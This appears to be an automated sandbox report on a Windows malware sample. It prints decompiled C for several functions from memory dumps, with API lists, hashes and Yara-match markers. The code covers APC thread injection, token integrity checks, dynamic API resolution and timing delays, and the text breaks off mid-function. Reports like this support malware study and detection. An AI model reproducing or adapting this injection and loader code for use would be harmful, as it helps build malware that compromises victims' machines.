                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BB9EA5
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02BB587F), ref: 02BB9EC3
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3239747167-1536154274
                                                                                                                                                                                                                                • Opcode ID: 90bdfca11676db0fe491d6d72a5f904e932f2d646cc6ddcc47210332e4e462ba
                                                                                                                                                                                                                                • Instruction ID: 0baa41d87d529462fae2a4cdcd658ad910660e42a0d9c9f61d6bbf276595cf7f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90bdfca11676db0fe491d6d72a5f904e932f2d646cc6ddcc47210332e4e462ba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F313971A0020AAFDB12DFA9CD80ABEB7FAFF48240F514469E545D3210E7B0EE159F20
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B81000, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 32threadinjectionCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B81000(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x2b841c0, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                                                                                                                                                                                                0x02b81017
                                                                                                                                                                                                                                0x02b8101d
                                                                                                                                                                                                                                0x02b81021
                                                                                                                                                                                                                                0x02b8102c
                                                                                                                                                                                                                                0x02b81034
                                                                                                                                                                                                                                0x02b8103d
                                                                                                                                                                                                                                0x02b81041
                                                                                                                                                                                                                                0x02b81048
                                                                                                                                                                                                                                0x02b8104f
                                                                                                                                                                                                                                0x02b81051
                                                                                                                                                                                                                                0x02b81057
                                                                                                                                                                                                                                0x02b81034
                                                                                                                                                                                                                                0x02b8105b

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 02B81017
                                                                                                                                                                                                                                • QueueUserAPC.KERNEL32(?,00000000,?), ref: 02B8102C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 02B81037
                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 02B81041
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02B81048
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02B81051
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 3832013932-1084903527
                                                                                                                                                                                                                                • Opcode ID: 289d3c699f36fe67e19f795a10f5c3f20fb2d8050d8f169e3e27df589e892a72
                                                                                                                                                                                                                                • Instruction ID: bc192ff3b1296028ffdf682959613f555546058da9144a046264d2b3bb1f979f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 289d3c699f36fe67e19f795a10f5c3f20fb2d8050d8f169e3e27df589e892a72
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22F08932D81651FBD3221BA1AC0CF5BBFE8FB08F91F000944F60DA6040C7218425DB51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB59B4, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB59B4(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2bbd294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02BB5157(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02BB53BB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                                                                                                                                                                                                0x02bb59c1
                                                                                                                                                                                                                                0x02bb59c8
                                                                                                                                                                                                                                0x02bb59cf
                                                                                                                                                                                                                                0x02bb59e3
                                                                                                                                                                                                                                0x02bb59ee
                                                                                                                                                                                                                                0x02bb5a06
                                                                                                                                                                                                                                0x02bb5a13
                                                                                                                                                                                                                                0x02bb5a16
                                                                                                                                                                                                                                0x02bb5a1b
                                                                                                                                                                                                                                0x02bb5a26
                                                                                                                                                                                                                                0x02bb5a2a
                                                                                                                                                                                                                                0x02bb5a39
                                                                                                                                                                                                                                0x02bb5a3d
                                                                                                                                                                                                                                0x02bb5a59
                                                                                                                                                                                                                                0x02bb5a59
                                                                                                                                                                                                                                0x02bb5a5d
                                                                                                                                                                                                                                0x02bb5a5d
                                                                                                                                                                                                                                0x02bb5a62
                                                                                                                                                                                                                                0x02bb5a66
                                                                                                                                                                                                                                0x02bb5a6c
                                                                                                                                                                                                                                0x02bb5a6d
                                                                                                                                                                                                                                0x02bb5a74
                                                                                                                                                                                                                                0x02bb5a7a

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02BB59E6
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02BB5A06
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02BB5A16
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB5A66
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02BB5A39
                                                                                                                                                                                                                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02BB5A41
                                                                                                                                                                                                                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02BB5A51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1295030180-0
                                                                                                                                                                                                                                • Opcode ID: a20341934e137b1924f84aaa38d88fac4b42be317574c8b8139713429bc9fe2c
                                                                                                                                                                                                                                • Instruction ID: 5cd827c92419cbe2f6729f9630178e78d48d07e11624d7ba9185bacb8751ec56
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a20341934e137b1924f84aaa38d88fac4b42be317574c8b8139713429bc9fe2c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4211975900209BFEB129F94DC84EEEBBB9EF09344F4044A6E910A7250C7B58A55DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B81C61, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B81C61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E02B82020(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x2b841c4 + 0x2b85014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x2b841c4 + 0x2b85151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E02B81F0A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x2b841c4 + 0x2b85161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x2b841c4 + 0x2b85174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x2b841c4 + 0x2b85189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x2b841c4 + 0x2b8519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E02B812E2(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                                                                                0x02b81c6f
                                                                                                                                                                                                                                0x02b81c73
                                                                                                                                                                                                                                0x02b81d34
                                                                                                                                                                                                                                0x02b81c79
                                                                                                                                                                                                                                0x02b81c91
                                                                                                                                                                                                                                0x02b81ca0
                                                                                                                                                                                                                                0x02b81ca7
                                                                                                                                                                                                                                0x02b81ca9
                                                                                                                                                                                                                                0x02b81cae
                                                                                                                                                                                                                                0x02b81d2c
                                                                                                                                                                                                                                0x02b81d2d
                                                                                                                                                                                                                                0x02b81cb0
                                                                                                                                                                                                                                0x02b81cbd
                                                                                                                                                                                                                                0x02b81cbf
                                                                                                                                                                                                                                0x02b81cc4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81cc6
                                                                                                                                                                                                                                0x02b81cd3
                                                                                                                                                                                                                                0x02b81cd5
                                                                                                                                                                                                                                0x02b81cda
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81cdc
                                                                                                                                                                                                                                0x02b81ce9
                                                                                                                                                                                                                                0x02b81ceb
                                                                                                                                                                                                                                0x02b81cf0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81cf2
                                                                                                                                                                                                                                0x02b81cff
                                                                                                                                                                                                                                0x02b81d01
                                                                                                                                                                                                                                0x02b81d06
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81d08
                                                                                                                                                                                                                                0x02b81d0e
                                                                                                                                                                                                                                0x02b81d14
                                                                                                                                                                                                                                0x02b81d19
                                                                                                                                                                                                                                0x02b81d1e
                                                                                                                                                                                                                                0x02b81d23
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81d25
                                                                                                                                                                                                                                0x02b81d28
                                                                                                                                                                                                                                0x02b81d28
                                                                                                                                                                                                                                0x02b81d23
                                                                                                                                                                                                                                0x02b81d06
                                                                                                                                                                                                                                0x02b81cf0
                                                                                                                                                                                                                                0x02b81cda
                                                                                                                                                                                                                                0x02b81cc4
                                                                                                                                                                                                                                0x02b81cae
                                                                                                                                                                                                                                0x02b81d42

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02B82020: HeapAlloc.KERNEL32(00000000,?,02B81593,00000030,747863F0,00000000), ref: 02B8202C
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,02B81FB8,?,?,?,?,?,00000002,?,?), ref: 02B81C85
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B81CA7
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B81CBD
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B81CD3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B81CE9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B81CFF
                                                                                                                                                                                                                                  • Part of subcall function 02B812E2: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 02B8133F
                                                                                                                                                                                                                                  • Part of subcall function 02B812E2: memset.NTDLL ref: 02B81361
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1632424568-0
                                                                                                                                                                                                                                • Opcode ID: ebfdbbf4cb0a00c75852732563325cb07dbbdbba5e1a43522c299b28e8088e99
                                                                                                                                                                                                                                • Instruction ID: aaa9d37d2561f0f6cb8cbbec3d146c14fefe44bf8f4af336b025075338ff46c6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebfdbbf4cb0a00c75852732563325cb07dbbdbba5e1a43522c299b28e8088e99
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80214D74A0160BAFC721EF79DC84A6AB7FCEF0434470248A5E90DD7241E770EA02CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B813CC, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x2b84188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x2b8418c;
						if( *0x2b8418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x2b84198;
								if( *0x2b84198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x2b8418c);
						}
						HeapDestroy( *0x2b84190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x2b84188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x2b84190 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x2b841b0 = _a4;
							asm("lock xadd [eax], edi");
							_t23 = E02B81000(E02B81EB4, E02B81971(_a12, 1, 0x2b84198, _t41),  &_a8);
							 *0x2b8418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                                                                                0x02b813cf
                                                                                                                                                                                                                                0x02b813db
                                                                                                                                                                                                                                0x02b813dd
                                                                                                                                                                                                                                0x02b813e0
                                                                                                                                                                                                                                0x02b81456
                                                                                                                                                                                                                                0x02b8145c
                                                                                                                                                                                                                                0x02b8145e
                                                                                                                                                                                                                                0x02b81460
                                                                                                                                                                                                                                0x02b81466
                                                                                                                                                                                                                                0x02b81468
                                                                                                                                                                                                                                0x02b8146d
                                                                                                                                                                                                                                0x02b81470
                                                                                                                                                                                                                                0x02b8147b
                                                                                                                                                                                                                                0x02b8147d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b8147f
                                                                                                                                                                                                                                0x02b81482
                                                                                                                                                                                                                                0x02b81484
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81484
                                                                                                                                                                                                                                0x02b8148c
                                                                                                                                                                                                                                0x02b8148c
                                                                                                                                                                                                                                0x02b81498
                                                                                                                                                                                                                                0x02b81498
                                                                                                                                                                                                                                0x02b813e2
                                                                                                                                                                                                                                0x02b813e3
                                                                                                                                                                                                                                0x02b81403
                                                                                                                                                                                                                                0x02b81409
                                                                                                                                                                                                                                0x02b8140e
                                                                                                                                                                                                                                0x02b81410
                                                                                                                                                                                                                                0x02b8144c
                                                                                                                                                                                                                                0x02b8144c
                                                                                                                                                                                                                                0x02b81412
                                                                                                                                                                                                                                0x02b8141a
                                                                                                                                                                                                                                0x02b81421
                                                                                                                                                                                                                                0x02b81437
                                                                                                                                                                                                                                0x02b8143c
                                                                                                                                                                                                                                0x02b81443
                                                                                                                                                                                                                                0x02b81448
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81448
                                                                                                                                                                                                                                0x02b81443
                                                                                                                                                                                                                                0x02b81410
                                                                                                                                                                                                                                0x02b813e3
                                                                                                                                                                                                                                0x02b814a5

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(02B84188), ref: 02B813EE
                                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 02B81403
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: CreateThread.KERNEL32 ref: 02B81017
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: QueueUserAPC.KERNEL32(?,00000000,?), ref: 02B8102C
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: GetLastError.KERNEL32(00000000), ref: 02B81037
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: TerminateThread.KERNEL32(00000000,00000000), ref: 02B81041
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: CloseHandle.KERNEL32(00000000), ref: 02B81048
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: SetLastError.KERNEL32(00000000), ref: 02B81051
                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(02B84188), ref: 02B81456
                                                                                                                                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 02B81470
                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 02B8148C
                                                                                                                                                                                                                                • HeapDestroy.KERNEL32 ref: 02B81498
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2110400756-0
                                                                                                                                                                                                                                • Opcode ID: 962e526535652570e6a2cb2282d7aad283a32de76f2616264349efe7cfca607f
                                                                                                                                                                                                                                • Instruction ID: e3499da7181fef62926ddb52a79e7ff1aa09424d35eded8e0bc2c13d8043e536
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 962e526535652570e6a2cb2282d7aad283a32de76f2616264349efe7cfca607f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00218E31E92206AFD710BFADEC84B697FB8EB54AA471848A5F50DF3110E3308961CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB4D07, Relevance: 9.1, APIs: 6, Instructions: 61sleepmemorytimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E02BB4D07(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2bbd270 = _t10;
				if(_t10 != 0) {
					 *0x2bbd160 = GetTickCount();
					_t12 = E02BB6246(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L02BBB01E();
							_t34 = _t14 + _t16;
							_t18 = E02BB120C(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E02BB75DD(_t26) != 0) {
							 *0x2bbd298 = 1; // executed
						}
						_t12 = E02BB5701(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                                                                                                                                                                                                0x02bb4d07
                                                                                                                                                                                                                                0x02bb4d0d
                                                                                                                                                                                                                                0x02bb4d0e
                                                                                                                                                                                                                                0x02bb4d1a
                                                                                                                                                                                                                                0x02bb4d20
                                                                                                                                                                                                                                0x02bb4d27
                                                                                                                                                                                                                                0x02bb4d37
                                                                                                                                                                                                                                0x02bb4d3c
                                                                                                                                                                                                                                0x02bb4d43
                                                                                                                                                                                                                                0x02bb4d45
                                                                                                                                                                                                                                0x02bb4d4a
                                                                                                                                                                                                                                0x02bb4d50
                                                                                                                                                                                                                                0x02bb4d56
                                                                                                                                                                                                                                0x02bb4d60
                                                                                                                                                                                                                                0x02bb4d64
                                                                                                                                                                                                                                0x02bb4d66
                                                                                                                                                                                                                                0x02bb4d6b
                                                                                                                                                                                                                                0x02bb4d6c
                                                                                                                                                                                                                                0x02bb4d6d
                                                                                                                                                                                                                                0x02bb4d72
                                                                                                                                                                                                                                0x02bb4d78
                                                                                                                                                                                                                                0x02bb4d83
                                                                                                                                                                                                                                0x02bb4d84
                                                                                                                                                                                                                                0x02bb4d8a
                                                                                                                                                                                                                                0x02bb4d90
                                                                                                                                                                                                                                0x02bb4d9c
                                                                                                                                                                                                                                0x02bb4d9e
                                                                                                                                                                                                                                0x02bb4d9e
                                                                                                                                                                                                                                0x02bb4da8
                                                                                                                                                                                                                                0x02bb4da8
                                                                                                                                                                                                                                0x02bb4d29
                                                                                                                                                                                                                                0x02bb4d2b
                                                                                                                                                                                                                                0x02bb4d2b
                                                                                                                                                                                                                                0x02bb4db2

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,02BB5992,?), ref: 02BB4D1A
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BB4D2E
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02BB5992,?), ref: 02BB4D4A
                                                                                                                                                                                                                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,02BB5992,?), ref: 02BB4D50
                                                                                                                                                                                                                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 02BB4D6D
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,02BB5992,?), ref: 02BB4D8A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 507476733-0
                                                                                                                                                                                                                                • Opcode ID: 00fc3d8695dc6090b7348dfc24b283c6fa97f1ca8d9588e9ac843d84993fb230
                                                                                                                                                                                                                                • Instruction ID: 8f3012de977a2519dfa9a69ad37dc98c63fbadd356cdef977e4eca3ed56ec508
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00fc3d8695dc6090b7348dfc24b283c6fa97f1ca8d9588e9ac843d84993fb230
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1011CA72E902056FD7129B64DC19BAA7BADEF44395F400566FA45C7180EBF4D810CA61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB202A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108synchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 61%
                                                                                                                                                                                                                                			E02BB202A(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				void* _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				long _t52;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // executed
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_t44 =  *0x2bbd130(0, 1,  &_v24); // executed
				if(_t44 != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E02BB5157(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0x2bbd2a4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E02BB53BB(_v20);
							if(_v8 == 0) {
								_t52 = E02BB50DE(_v24, _t64); // executed
								_v8 = _t52;
							}
							goto L21;
						}
